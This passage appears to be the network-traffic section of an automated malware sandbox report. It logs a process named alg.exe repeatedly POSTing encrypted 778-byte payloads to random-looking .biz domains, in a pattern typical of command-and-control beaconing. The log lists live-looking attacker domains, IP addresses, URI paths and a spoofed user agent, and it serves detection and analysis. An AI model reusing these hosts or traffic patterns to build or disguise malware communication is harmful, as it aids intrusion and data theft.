                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: nlscndwp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:42.735919952 CET778OUTData Raw: 31 01 a4 32 18 e8 5e fb fe 02 00 00 f7 86 31 f6 bd 02 c4 a6 78 98 97 6c cb fe eb a6 d4 07 81 43 af 9a 39 c1 29 91 28 b2 da c8 ee 49 f4 cb 5a 19 c2 fc 76 47 e3 5f ea 94 b2 b2 a3 1f d7 75 d3 99 62 cf 0a 08 9d fb 12 d8 c9 c6 64 17 c3 ec c0 08 3f 3e
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 12^1xlC9)(IZvG_ubd?>"cgQL1!wG1]:=_MA9V lK>WC&,!^~ f:p>@23PD8TAK3G^t
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.565865993 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=30f223389e1fadeed229f1d1a431deb0|155.94.241.188|1730130763|1730130763|0|1|0; path=/; domain=.nlscndwp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  121192.168.2.5599973.94.10.34802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.679754019 CET354OUTPOST /lhdfgbabu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: bzkysubds.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:43.679774046 CET778OUTData Raw: 28 d7 15 ae 57 b0 95 43 fe 02 00 00 6c 0a 42 65 b9 0c 3d 06 a0 85 70 b8 8d 46 65 60 eb 96 35 8c d3 97 1d 75 36 14 46 7f 99 85 2d 8f 20 83 6f 59 60 7f 28 73 1f e5 19 32 fa 33 93 24 5d b9 a9 50 3b 4f 64 e5 23 05 dd 6a 8a de ed ed 67 01 a8 37 d6 94
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: (WClBe=pFe`5u6F- oY`(s23$]P;Od#jg7.5D{m\5s'tQ;D.1P\Tpfh+NA |wiNHIZ6pL]\E{DsJPB[/t}x2dxb8oaQ_i0!F:q.S
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:44.343225956 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=39284023ea0fffa8c73ce7f1f9e57492|155.94.241.188|1730130764|1730130764|0|1|0; path=/; domain=.bzkysubds.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  122192.168.2.55999818.208.156.248802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:44.377974987 CET356OUTPOST /qscftkkkcjjor HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ltpqsnu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:44.378000975 CET778OUTData Raw: ec 32 43 d6 78 70 23 a5 fe 02 00 00 ae 63 4c a1 df 6c 87 64 e2 1a b7 11 c0 a2 b2 18 9c b4 ec 4b 3f 65 26 66 b4 5e d8 e2 12 b2 0d d3 6a 9a 0e 4f 63 61 4b 35 6e 25 80 76 88 3a 60 44 7f 9f 26 a6 3f 1f ae 7c 38 a9 78 87 ae d4 34 6b 70 ef bb ba ee 5e
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 2Cxp#cLldK?e&f^jOcaK5n%v:`D&?|8x4kp^Rz[lz~E"1H)|vs9m{1'=^rmV(Jfvbw%~!`mjgbb$2=np25Cksv4Ic!_U
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.037393093 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=4ff85c967e2d753a629cb505957f1b83|155.94.241.188|1730130764|1730130764|0|1|0; path=/; domain=.ltpqsnu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  123192.168.2.55999918.246.231.120802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.059422016 CET344OUTPOST /bsw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: vnvbt.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.059459925 CET778OUTData Raw: b2 89 39 fe e3 86 da 98 fe 02 00 00 ba 79 70 fe 5f b4 56 4d 37 fb 10 a6 1b 3e bd dd 0e e2 9d 2e 6a 39 a4 f0 2b a4 38 83 65 49 37 d3 67 2d ab 9d f7 af 72 58 56 d3 ef 46 e9 a2 9a 71 52 7d 29 a0 8a f0 76 96 07 62 25 18 c1 c0 30 54 a1 77 40 3e 10 5c
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 9yp_VM7>.j9+8eI7g-rXVFqR})vb%0Tw@>\Uo>WAy}S\juxZYtrieMxunNB#]KdZ2+zRNcJ`|O.4L)apJy8O|@PCDyWCx9~-=$bp
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.892080069 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=c0371f6fad110df6016a8e69cdfda9ba|155.94.241.188|1730130765|1730130765|0|1|0; path=/; domain=.vnvbt.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  124192.168.2.5600003.94.10.34802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.919753075 CET354OUTPOST /grbkwbsae HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ypituyqsq.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:45.919776917 CET778OUTData Raw: a8 7a e4 b1 1e 8b 95 37 fe 02 00 00 ee a6 7b 53 ed 8f 98 7f 93 77 4f e8 08 c3 a1 8c 09 58 29 a6 16 23 45 52 a4 14 16 6f bb 70 36 9c a0 7d 22 c6 76 6f 37 aa d4 d7 05 75 7d 28 5b 7d 2b 80 19 34 c6 f1 4d 13 45 0f 23 8f aa 78 d5 74 d1 f5 83 5a 94 9f
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: z7{SwOX)#ERop6}"vo7u}([}+4ME#xtZ,37ww}ZT`]Q'+/y8`c3^(]W/[hw+1.RMcn4uv3]1!JXfsAW00N0p;2NvVZ/H#RL
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.585510969 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=380cf4c1db9551d28cb8e0e3f9e02a49|155.94.241.188|1730130766|1730130766|0|1|0; path=/; domain=.ypituyqsq.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  125192.168.2.56000135.164.78.200802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.612720013 CET359OUTPOST /vlwdbxkbnakykkgr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ijnmvqa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:46.612736940 CET778OUTData Raw: 9f 9c 95 ce e8 b6 aa a5 fe 02 00 00 05 3f 9e 45 4b 8f 95 db 8d 3d ed 86 f6 4b 84 15 f9 4d 4b db 80 55 09 44 c3 25 b5 34 3b 0a 90 61 66 46 a6 a8 09 31 a0 6b 8c 83 80 22 ad a8 f3 84 24 9a 94 c3 e9 27 df ad 72 36 b1 7b e5 7c 84 c5 bc 33 0c 21 4b 76
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: ?EK=KMKUD%4;afF1k"$'r6{|3!KvWG`OqM$XV8lC#Ns{NNK@Zp\[Y,+4cAGOJqcL>,w}3G"'{#}iE_rN|1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.453248024 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:47 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=35a230a9f03934c5637dbc965b718612|155.94.241.188|1730130767|1730130767|0|1|0; path=/; domain=.ijnmvqa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  126192.168.2.56000218.208.156.248802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.504612923 CET350OUTPOST /agvjkxoax HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: tltxn.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:47.504640102 CET778OUTData Raw: c9 54 c3 76 cd 27 ed 4f fe 02 00 00 1b ca 90 e7 67 8c 44 8a c1 86 b7 d8 41 42 61 83 87 a6 2f 9e c3 3a 23 ac 91 fd 81 e9 33 19 a8 e6 2f f3 a3 89 20 40 89 35 8f 8c c0 9c 10 e4 d0 7b 9e 73 68 19 eb 6f df 17 59 cd 8f c1 0f a0 81 b5 31 f3 23 3d ee 42
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: Tv'OgDABa/:#3/ @5{shoY1#=B"jo\KXS5ybw>#c}3W_z!Se~?KD1[`L[wQMVyRz]TW[c]|gx7rAPxQJOiYtEL{-*6I1Of/rim
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.176425934 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=5fd9e6771f810c04187364fca1a2c986|155.94.241.188|1730130768|1730130768|0|1|0; path=/; domain=.tltxn.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  127192.168.2.56000354.244.188.177802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.204962969 CET349OUTPOST /gopuf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: vgypotwp.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:48.204989910 CET778OUTData Raw: f5 3c f6 88 40 bd 89 c9 fe 02 00 00 9e dd 00 59 5c 20 b9 18 a4 39 0e f0 76 56 5d 8c 20 fd d7 7d a5 72 e0 aa 12 69 a6 4d 90 d7 c3 35 fc 2f 20 40 55 02 84 d2 10 5b 1e ce 01 e8 11 be 33 c3 6e 37 87 b6 11 60 e3 fd ea 12 32 d2 8a da 55 9e 8a 06 ed 81
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: <@Y\ 9vV] }riM5/ @U[3n7`2UEi*hobBc<S5M~^SE.R 3&kfkGElRgMH9]dHY[Yx&,zjX'kT('"&.V<_0q!/H
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.085321903 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:48 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=1276720df5c555a96cb1b901a6f243d8|155.94.241.188|1730130768|1730130768|0|1|0; path=/; domain=.vgypotwp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  128192.168.2.56000418.246.231.120802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.127609015 CET347OUTPOST /cfjx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: giliplg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.127643108 CET778OUTData Raw: b8 4b e4 10 d5 1a 39 05 fe 02 00 00 90 cc 99 13 8c 30 f0 62 b5 a1 84 c0 81 ea f1 69 21 84 c5 01 61 16 26 d5 24 bc 0d 3b 2a 4e 14 3b db 89 f8 b6 01 ca 45 64 e1 2c 7f 09 43 93 96 21 76 b0 e2 7c 55 e3 d9 3c 58 c3 4c 7f 23 57 08 33 52 19 7f 1f b1 86
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: K90bi!a&$;*N;Ed,C!v|U<XL#W3REA&$5:d<ae;AJ;ITK E=e;s1/-M GDOxR1FCqAC-wKV%u;t;F~XzG\$B,<*nz5p>s
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:49.959461927 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:49 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=15f3ae4d814c564364e51aa340477d69|155.94.241.188|1730130769|1730130769|0|1|0; path=/; domain=.giliplg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  129192.168.2.56000554.244.188.177802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.053610086 CET359OUTPOST /rtjiyksbemvook HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: pywolwnvd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.053637028 CET778OUTData Raw: ad 3c 8f c2 11 1f f4 a4 fe 02 00 00 cc 19 b2 ee bf d7 45 60 4f 1b 80 93 54 01 39 74 f5 e9 4d 88 0e 3c 1c d0 50 ad 85 2e 9e b6 1a 0b c3 07 3e ed c4 5f 2f 24 9e 2f 11 e6 cd 14 20 2b 48 82 90 fb fe da c8 7e 23 7a f2 9f ff 52 1b 65 93 56 af 92 f0 08
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: <E`OT9tM<P.>_/$/ +H~#zReV&wusQi Nx57g0K,U?[IBe|,?8(bYXfR \cr<i[2nQOoR!]7!8LtVWO*y')p@-1{s#E
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:50.819294930 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:52:50 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=a4769efbc79841a30b2ce72ccae5ef3b|155.94.241.188|1730130770|1730130770|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
